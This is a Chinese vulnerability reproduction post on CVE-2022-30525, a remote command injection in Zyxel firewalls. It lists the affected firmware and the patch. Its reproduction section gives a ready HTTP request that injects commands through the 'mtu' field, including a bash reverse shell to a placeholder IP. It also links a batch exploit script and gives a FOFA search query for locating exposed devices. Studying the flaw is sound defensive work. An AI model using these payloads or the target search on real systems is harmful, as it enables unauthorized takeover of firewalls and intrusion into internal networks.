Zyxel 防火墙
此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。
CVE-2022-30525
漏洞简介
2022 年 5 月 12 日,Zyxel(合勤)发布安全公告,修复了其防火墙设备中未经身份验证的远程命令注入漏洞(CVE-2022-30525),该漏洞的CVSS评分为9.8。
该漏洞存在于某些Zyxel防火墙版本的 CGI 程序中,允许在未经身份验证的情况下在受影响设备上以nobody用户身份执行任意命令。
目前该漏洞的细节已经公开披露,且相应的Metasploit 模块已经发布,成功利用可以实现文件修改和操作系统命令执行,以获得对网络的初始访问权限并实现横向移动到内部系统。
漏洞影响
受影响的型号 | 受影响的固件版本 | 补丁版本 |
---|---|---|
USG FLEX 100(W)、200、500、700 | ZLD V5.00 -ZLD V5.21 Patch 1 | ZLD V5.30 |
USG FLEX 50(W) / USG20(W)-VPN | ZLD V5.10 - ZLD V5.21 Patch 1 | ZLD V5.30 |
ATP系列 | ZLD V5.10 - ZLD V5.21 Patch 1 | ZLD V5.30 |
VPN系列 | ZLD V4.60 - ZLD V5.21 Patch 1 | ZLD V5.30 |
漏洞修复
目前Zyxel已经修复了此漏洞,受影响用户可以升级更新到ZLD V5.30。无法立即更新的用户,可以禁用对受影响产品的管理 Web 界面的 WAN 访问以缓解此漏洞。
漏洞复现
访问https://xx.xx.xx.xx/ztp/cgi-bin/handler,修改为post方式,加入payload
漏洞验证
POST /ztp/cgi-bin/handler HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 130
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping ***.dnslog.cn;","data":"hi"}
反弹shell
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":";bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1';","data":"hi"}
利用工具
github上有师傅已经写好的脚本:https://github.com/Henry4E36/CVE-2022-30525
python CVE-2022-30525.py -f ip.txt
FOFA语法
body="USG FLEX 100"
原文始发于微信公众号(漏洞挖掘之路):CVE-2022-30525漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论